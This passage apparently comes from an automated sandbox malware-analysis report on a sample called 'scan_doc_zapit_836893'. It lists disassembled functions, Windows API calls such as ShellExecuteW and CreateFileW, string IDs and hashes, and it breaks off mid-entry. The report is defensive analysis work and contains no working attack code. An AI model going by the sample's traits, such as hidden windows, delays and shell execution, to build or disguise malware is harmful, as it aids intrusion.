                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: PrivateProfileStringWritelstrcpyn
                                                      • String ID: 141$<RM>$WriteINIStr: wrote [%s] %s=%s in %s
                                                      • API String ID: 247603264-2626180455
                                                      • Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                      • Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
                                                      • Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
                                                      • Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 873 4021b5-40220b call 40145c * 4 call 404f72 ShellExecuteW 884 402223-4030f2 call 4062a3 873->884 885 40220d-40221b call 4062a3 873->885 885->884
                                                      APIs
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                        • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                        • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                        • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                        • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                      • ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      Strings
                                                      • ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
                                                      • ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
                                                      • String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
                                                      • API String ID: 3156913733-2180253247
                                                      • Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                      • Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
                                                      • Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
                                                      • Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 893 405e7f-405e8b 894 405e8c-405ec0 GetTickCount GetTempFileNameW 893->894 895 405ec2-405ec4 894->895 896 405ecf-405ed1 894->896 895->894 898 405ec6 895->898 897 405ec9-405ecc 896->897 898->897
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405E9D
                                                      • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                      • Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
                                                      • Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
                                                      • Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 899 402175-40218b call 401446 * 2 904 402198-40219d 899->904 905 40218d-402197 call 4062a3 899->905 907 4021aa-4021b0 EnableWindow 904->907 908 40219f-4021a5 ShowWindow 904->908 905->904 909 4030e3-4030f2 907->909 908->909
                                                      APIs
                                                      • ShowWindow.USER32(00000000,00000000), ref: 0040219F
                                                        • Part of subcall function 004062A3: lstrlenW.KERNEL32(Sleep(4921),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                        • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                      • EnableWindow.USER32(00000000,00000000), ref: 004021AA
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Window$EnableShowlstrlenwvsprintf
                                                      • String ID: HideWindow
                                                      • API String ID: 1249568736-780306582
                                                      • Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                      • Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
                                                      • Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
                                                      • Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                      • Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
                                                      • Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
                                                      • Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                      • Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
                                                      • Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
                                                      • Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                      • Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
                                                      • Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
                                                      • Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                      • Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
                                                      • Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
                                                      • Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                      • Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
                                                      • Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
                                                      • Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                      • Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
                                                      • Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
                                                      • Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86
                                                      APIs
                                                      • GlobalFree.KERNELBASE(?), ref: 004073C5
                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
                                                      • GlobalFree.KERNELBASE(?), ref: 0040743D
                                                      • GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Global$AllocFree
                                                      • String ID:
                                                      • API String ID: 3394109436-0
                                                      • Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                      • Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
                                                      • Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
                                                      • Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85
                                                      APIs
                                                      • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
                                                      • SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                      • Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
                                                      • Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
                                                      • Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
                                                      • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: File$AttributesCreate
                                                      • String ID:
                                                      • API String ID: 415043291-0
                                                      • Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                      • Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
                                                      • Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
                                                      • Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15
                                                      APIs
                                                      • GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: AttributesFile
                                                      • String ID:
                                                      • API String ID: 3188754299-0
                                                      • Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                      • Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
                                                      • Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
                                                      • Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18
                                                      APIs
                                                      • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: FileRead
                                                      • String ID:
                                                      • API String ID: 2738559852-0
                                                      • Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                      • Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
                                                      • Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
                                                      • Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8
                                                      APIs
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                        • Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                        • Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                      • CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: Char$Next$CreateDirectoryPrev
                                                      • String ID:
                                                      • API String ID: 4115351271-0
                                                      • Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                      • Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
                                                      • Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
                                                      • Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE
                                                      APIs
                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2162625362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.2162599547.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162648055.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162675823.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2162761940.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_scan_doc_zapit_836893.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
